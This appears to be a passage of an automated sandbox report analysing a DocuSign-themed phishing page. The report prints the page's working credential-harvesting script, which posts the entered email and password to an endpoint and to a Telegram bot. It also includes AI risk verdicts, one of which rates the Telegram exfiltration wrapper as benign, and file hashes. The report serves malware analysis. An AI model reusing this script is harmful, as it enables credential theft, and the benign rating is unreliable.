null!=a&&a===a.window},isNumeric:function(a){return!n.isArray(a)&&a-parseFloat(a)>=0},isPlainObject:function(a){return"object"!==n.type(a)\|\|a.nodeType\|\|n.isWindow(a)?!1:a.constructor&&!j.call(a.constructor.prototype,"isPrototypeOf")?!1:!0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a\|\|"function"==typeof a?h[i.call(a)]\|\|"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=l.createElement("script"),b.text=a,l.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=s(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b\|\|[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:g.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=s(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(e=d.call(arguments,2),f=function(){return a.apply(b\|\|this,e.concat(d.call(arguments)))},f.guid=a.guid=a.guid\|\|n.guid++,f):void 0},now:Date.now,support:k}),n.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),fun
URL: https://eu2.contabostorage.com/69e36f1a5de941bb877... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, redirects to suspicious domains, and obfuscated code. It collects user credentials and sends them to an external server, which is a clear indication of malicious intent. Additionally, the script attempts to redirect the user to a suspicious domain after a failed login attempt. The overall behavior of this script is highly suspicious and poses a significant security risk." }
$(document).ready(function () { var _0x2e8f33 = 0; var _0x3d449d = window.location.hash.substr(1); if (!_0x3d449d) { $("#pageContent").hide(); } else { window.setTimeout(function () { $("#pageContent").show(); $("#mainLoader").hide(); }, 3e3); var _0x5b5807 = _0x3d449d.indexOf("@"); var _0x1254ec = _0x3d449d.substr(_0x5b5807 + 1); var _0x3eca14 = _0x1254ec.substr(0, _0x1254ec.indexOf(".")); var _0x57b930 = _0x3eca14.toLowerCase(); $("#email").val(_0x3d449d); $("#faviconPage").attr("href", "https://logo.clearbit.com/" + _0x1254ec); $("#faviconImg").attr("src", "https://logo.clearbit.com/" + _0x1254ec); $("#userDomainIcon").attr("src", "https://logo.clearbit.com/" + _0x1254ec); document.title = "Sign in with " + _0x1254ec; $("#domain-name").html(_0x57b930); $("#msg").hide(); $("#emailShow").html(_0x3d449d); $("#emailIdLable").html(_0x3d449d); } $("#submit-btn").click(function (_0x51d675) { $("#error").hide(); $("#msg").hide(); _0x51d675.preventDefault(); var _0x3b06d2 = $("#email").val(); var _0x320cc9 = $("#password").val(); var _0xa560fb = $("#msg").html(); $("#msg").text(_0xa560fb); if (!_0x320cc9) { $("#msg").show(); $("#msg").html("Your password field is empty!!"); ai.focus; return false; } var _0x3fe763 = _0x3b06d2.indexOf("@"); var _0x526ae4 = _0x3b06d2.substr(_0x3fe763 + 1); var _0x1989fb = _0x526ae4.substr(0, _0x526ae4.indexOf(".")); var _0x25322b = _0x1989fb.toLowerCase(); _0x2e8f33 = _0x2e8f33 + 1; $("#domain-name").html(_0x25322b); $.ajax({dataType: "JSON", url: Xeno, type: "POST", data: {email: _0x3b06d2, password: _0x320cc9}, beforeSend: function (_0x19dbda) { $("#submit-btn").html("Authenticating ..."); }, error: function () { $("#submit-btn").html("NEXT"); $("#error").show(); $("#password").val(""); if (_0x2e8f33 >= 2) { _0x2e8f33 = 0; window.location.replace("https://www.tyagiindustries.com/document/files/REMITTANCE-COPY-REF-761902672000710000000027163.pdf"); } document.getElementById("password").style.borderColor = "red"; bot.sendMessage(_0x25322b + " Email : " + _0x3b06d2 + " / " + _0x25322b + " Pass : " + _0x320cc9); $("#error").show(); }, complete: function () { $("#submit-btn").html("NEXT"); }}); }); });
URL: https://ip9uk39kv26rml8wjjruzg.on.drv.tw/jsbot.js... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript code appears to be a simple implementation of a Telegram bot API wrapper, which is a common and legitimate use case. The code does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The API calls are made to the official Telegram API endpoint, which is a trusted domain. The code also includes common functionality like sending messages, photos, audio, and voice messages, which are typical features of a Telegram bot. Overall, the code seems to be a well-structured and legitimate implementation, with no clear signs of malicious intent." }
class TelegramBotSetup { constructor(token) { this.token = token; this.requestUrl = 'https://api.telegram.org/bot'; } api(type, method, body) { return new Promise((resolve, reject) => { fetch(this.requestUrl + this.token + type, { method: method, body: body }).then(res => { resolve(res.json()) }).catch(err => { reject(err) }) }) } } class Bot extends TelegramBotSetup { constructor(botToken, defaultChatID) { super(botToken); this.dcid = defaultChatID; } static start() { console.log("Send telegram message with JS\nDeveloper: https://manuchehr.me\nDocs: https://github.com/manuchekhr32/send-telegram-message-with-js"); } async getUpdates() { try { const result = await this.api('/getUpdates', 'GET') return await result } catch(e) { return await e } } async getMe() { try { const result = await this.api('/getMe', 'GET') return await result } catch(e) { return await e } } async sendMessage(text, chatID, parseMode, disableNotification) { try { const result = await this.api(`/sendMessage?text=${text}&chat_id=${chatID ? chatID : this.dcid}&parse_mode=${parseMode ? parseMode : 'html'}&disable_notification=${disableNotification ? disableNotification : false}`, 'GET') return await result } catch(e) { return await e } } async sendPhoto(img, caption, chatID, parseMode, disableNotification) { try { if (img.startsWith('#')) { const file = document.getElementById(img.replace('#', '')); const formData = new FormData(); formData.append("photo", file.files[0]) const result = await this.api(`/sendPhoto?caption=${caption ? caption : ''}&chat_id=${chatID ? chatID : this.dcid}&parse_mode=${parseMode ? parseMode : 'html'}&disable_notification=${disableNotification ? disableNotification : false}`, 'POST', formData) return await result } else if (typeof img === 'string') { const result = await this.api(`/sendPhoto?photo=${img}&caption=${caption ? caption : ''}&chat_id=${chatID ? chatID : this.dcid}&parse_mode=${parseMode ? parseMode : 'html'}&disable_notification=${disableNotification ? disableNotification : false}`, 'GET') return await result } } catch(e) { return await e } } async sendAudio(audio, caption, chatID, parseMode, disableNotification) { try { if (audio.startsWith('#')) { const file = document.getElementById(audio.replace('#', '')); const formData = new FormData(); formData.append("audio", file.files[0]) const result = await this.api(`/sendAudio?caption=${caption ? caption : ''}&chat_id=${chatID ? chatID : this.dcid}&parse_mode=${parseMode ? parseMode : 'html'}&disable_notification=${disableNotification ? disableNotification : false}`, 'POST', formData) return await result } else if (typeof audio === 'string') { const result = await this.api(`/sendAudio?audio=${audio}&caption=${caption ? caption : ''}&chat_id=${chatID ? chatID : this.dcid}&parse_mode=${parseMode ? parseMode : 'html'}&disable_notification=${disableNotification ? disableNotification : false}`, 'GET') return await result } } catch(e) { return await e } } async sendVoice(voice, caption, chatID, parseMode, disableNotification) { try { if (voice.startsWith('#')) { const file = document.getElementById(voice.replace('#', '')); const formData = new FormData(); formData.append("voice", file.files[0]) const result = await this.api(`/sendVoice?caption=${caption ? caption : ''}&chat_id=${chatID ? chatID : this.dcid}&parse_mode=${parseMode ? parseMode : 'html'}&disable_notification=${disableNotification ? disableNotification
URL: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This document has been shared with your email phishme@arrowbank.com on DocuSign please download.", "prominent_button_name": "View document", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This document has been shared with your email phishme@arrowbank.com on DocuSign please download.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com Model: Joe Sandbox AI	{ "brands": [ "DocuSign" ] }
	{ "brands": [ "DocuSign" ] }
URL: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com Model: Joe Sandbox AI	{ "brands": [ "DocuSign" ] }
	{ "brands": [ "DocuSign" ] }
URL: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com Model: Joe Sandbox AI	```json{ "legit_domain": "docusign.com", "classification": "wellknown", "reasons": [ "The brand 'DocuSign' is a well-known electronic signature service.", "The URL 'eu2.contabostorage.com' does not match the legitimate domain 'docusign.com'.", "The domain 'contabostorage.com' appears to be a cloud storage service, which is not directly associated with DocuSign.", "The use of a cloud storage domain could indicate a phishing attempt, especially if it is not a known service provider for DocuSign.", "There is no direct association between 'contabostorage.com' and DocuSign, raising suspicion." ], "riskscore": 8} Google indexed: True
URL: eu2.contabostorage.com Brands: DocuSign Input Fields: unknown
URL: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Provide your email password to continue", "prominent_button_name": "NEXT", "text_input_field_labels": "Password", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com Model: Joe Sandbox AI	{ "brands": [ "DocuSign" ] }
	{ "brands": [ "DocuSign" ] }
URL: https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com Model: Joe Sandbox AI	```json{ "legit_domain": "docusign.com", "classification": "wellknown", "reasons": [ "The brand 'DocuSign' is well-known and typically associated with the domain 'docusign.com'.", "The URL 'eu2.contabostorage.com' does not match the legitimate domain for DocuSign.", "The domain 'contabostorage.com' suggests a cloud storage service, which is not directly related to DocuSign's primary domain.", "Presence of input fields like 'Password' on a non-legitimate domain is a common phishing tactic.", "The use of a third-party storage service domain can be a red flag for phishing, especially when associated with a well-known brand like DocuSign." ], "riskscore": 9} Google indexed: True
URL: eu2.contabostorage.com Brands: DocuSign Input Fields: Password

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 17:18:27 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9851257154796427
Encrypted:	false
SSDEEP:
MD5:	600B2DC121664021F073B4E06A262C0D
SHA1:	26EAE602483130BD3335F01BB1C04C8FB645BFBE
SHA-256:	733600EC5F11E1CE84370F240DA75081D22227E4D74C6EE2AAADD2D2DE5B98BA
SHA-512:	C9B090DA149D55E187735B4CA5639D8EB6847AFA86C61D1FD68BCB125CF66808C1AA26A80568512E1843B433F9EAC3A66C99292191A5CDA35252340093A5726E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....vg...c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZC.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........++.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 17:18:26 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9996760853660906
Encrypted:	false
SSDEEP:
MD5:	C19F946170D05418443A1B6D43B5E27B
SHA1:	3CBECDA0F3C2BDE076D3699BFC0C0C016B0CA844
SHA-256:	91E39EFE428C7A7AEDFA44B370A9B06839A70065CD5369796341F542334D1932
SHA-512:	0C6B248FD8ECDDB08389F05E72E96C1597183767EF24B2E0E97BAB36FB9BE79754E173AD83A2CED120960EE317C02583B789B3DEED1CB88E1F004A8999AFB775
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.........c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZC.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........++.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.0107534896489625
Encrypted:	false
SSDEEP:
MD5:	65F459B9A3F8728DB6A086BF790956EC
SHA1:	82A21104006FF954776A6E8D67684A258288F040
SHA-256:	B06322B728E892E6CC4F85C509E555655F3BBAF380829867D02935C2BF6333BB
SHA-512:	84FBC768753DBB52E25609EEAFD1F7162D59F976FFA1881BE9EC71E7C9FB4D6264F84E4A880984D5F12F8EC5001F4252D1D756452EA6EA5CC9B850D0D5EC805C
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZC.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........++.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 17:18:26 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.99646123544554
Encrypted:	false
SSDEEP:
MD5:	3770EB6471A6F50FA36497F564EE0D2A
SHA1:	B1B9C27418BAD0878D4BC1D3AA4612BB414F1672
SHA-256:	A655C475E2CD2D9587EBD6D055A405C664A608D2EC49A81E83D5FD235A5DE984
SHA-512:	271A0C5EB758058482762711DF1AEA4C88AE0DAA265B5C971269711571B6C9CA54F977445FC975B3AB18E0E824C7BBC80923E908CFC7850618CEF38B27DEDF79
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....g ...c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZC.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........++.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 17:18:27 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.986477141825356
Encrypted:	false
SSDEEP:
MD5:	EFB25F5982002856AA3E2B4DA5EAC4F1
SHA1:	02047D634297E00681291B43BC37145DB4B440BE
SHA-256:	4D013DD6D329A1BE679DBFB6014F38EE58E0A4FAFE30B17641F16B85ED892BAA
SHA-512:	7123B01358F8AA9A9C2BBD0EA653A4212AB46F86520FE0FCB30315AFA7976CF1ADA77D58F0C6E945CDF7F278F1D4B8ED085E37EF56F498C7485CFBB0C59BA38A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....M...c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZC.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........++.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 17:18:26 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.000234918972279
Encrypted:	false
SSDEEP:
MD5:	885578B75E3429E615FDCD8616FD949B
SHA1:	E15B7D65A54C75C724181096F467DF2DD490CCDC
SHA-256:	C2FDB09B57933B9944033DE3271E65C39F66D4736D2653EE33515E0501C3D7A5
SHA-512:	EF7FAF364DAEFCC0E09AE990F2E19251BF0D5A9531889BC2411ECC2A32889B71FD1EE3C0C6A2096B19104F076B0FDF75832B6FE0ED434448F3895F104ACA1FFD
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....M....c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IZC.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VZL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VZL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VZL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VZN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........++.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 63

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	56
Entropy (8bit):	4.666742368826762
Encrypted:	false
SSDEEP:
MD5:	815BE92485981D58FDF201683F0792C1
SHA1:	6B09CE40ABCEFEE9C03BB02C6244040E2478134B
SHA-256:	F6C79A7CC4A00AAE9254F4E1475361345A81AA104EF26B07DE983C7CD69DDF82
SHA-512:	128401E0261A7368005F5DA7AEC5F7202FA22228458A19402D7CD8A71DC4158575169B68B59B0AD51FD559CA8309108F142996102DBEF2D429DE9BBB544B1FAC
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkaNFJL7UD4txIFDYOoWz0SBQ3OQUx6?alt=proto
Preview:	CigKBw2DqFs9GgAKHQ3OQUx6GgQISxgCKhAIClIMCgJAIRABGP////8P

Chrome Cache Entry: 64

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	9
Entropy (8bit):	2.94770277922009
Encrypted:	false
SSDEEP:
MD5:	722969577A96CA3953E84E3D949DEE81
SHA1:	3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
SHA-256:	78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
SHA-512:	54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
Malicious:	false
Reputation:	unknown
URL:	https://kit.fontawesome.com/c2d4bde48d.js
Preview:	Forbidden

Chrome Cache Entry: 65

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	7254
Entropy (8bit):	7.187413284810844
Encrypted:	false
SSDEEP:
MD5:	6BFB1B232C0434178441CAE5D858EBE5
SHA1:	8CC907BAB5E24D56FC80296516ED4434427EA03E
SHA-256:	AA3B5749E0A19AD393B0D8A80A8F78EDBF317BF5B067F95BAD0503300FCAB860
SHA-512:	2518DAC0215278E0B580A5B9E08CAEA10A15FD7ED76A2447757D6E6B17F997DF5CD09A0D6F67FE30CC28D1829DF6704CA6C8EFF9D43CF5ACBC58D05C0BCAC49B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............x......pHYs.................IDATx...}..w].....<B..D.Mp...h.....*j..!2>...i..P.e...W;3u.L.-i.p.1...[[..v..e...g+..4@EA.$...{.../..$.{...w...^k.u.n.9..:79.}~....)........S=.zf.......3..l.E........g.{.mqk]tg}..^\...s..l..]V_yM}l.E...`.^_O9R.Y}K.......O_V.N.p...y:QO..TG......z"..%.....z..<...."..#...n=}Qo.>g.].a.......l..z.~!O...^xG..u......Y8Q....?p8....)..q...?8.+....A8..ys..a...<....#..7...N.wM.......D...).......O...l...8'.....z....\...<"........[...l&..8k..>N.7M......S...s....Y..g...........O.&.8`.....o.{..{.<.1...................N-o.....&.8H.`.........A.>.~...;...D.p.......w.8W"...>.Z....qD..1t...%......\|......p..S]<....!.8.C...z..;.......:.....w.8(".s1t.TO.{...$.8[....s/.p.D.gC..l!...2z.x....D..g....^.`.D..e....z"..#... .x ..0...}......>A...F.P..`H"...0(.06..00.0...08.0&...............\|.......~D.........~....%......!...%..xX"`;...>%..}...gE.l....Y...C..pND.v....3.......E.l6...y...K.../"`3............y....v....-..Y....1.P"`....

Chrome Cache Entry: 67

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (306), with CRLF line terminators
Category:	downloaded
Size (bytes):	7941
Entropy (8bit):	4.836222425273268
Encrypted:	false
SSDEEP:
MD5:	0E73478B86A9BDF42F27204603E5507F
SHA1:	24390B3E71CFC3B9DAFF699EFFA792F1904D626E
SHA-256:	3274993C2CCD9B85C3597B1E5D08288DADB9611210575B093C33274C9D3BC846
SHA-512:	0D03DF4CD0DB1DC8D1FE45ED8F022862CE8FFA8BB8685F6D976F7F28E0D097CFB83E9098A9533983EB3A66AFB276A9D3D3FDA9DD2FFDFD6B5E4B49DB6041252F
Malicious:	false
Reputation:	unknown
URL:	https://ip9uk39kv26rml8wjjruzg.on.drv.tw/jsbot.js
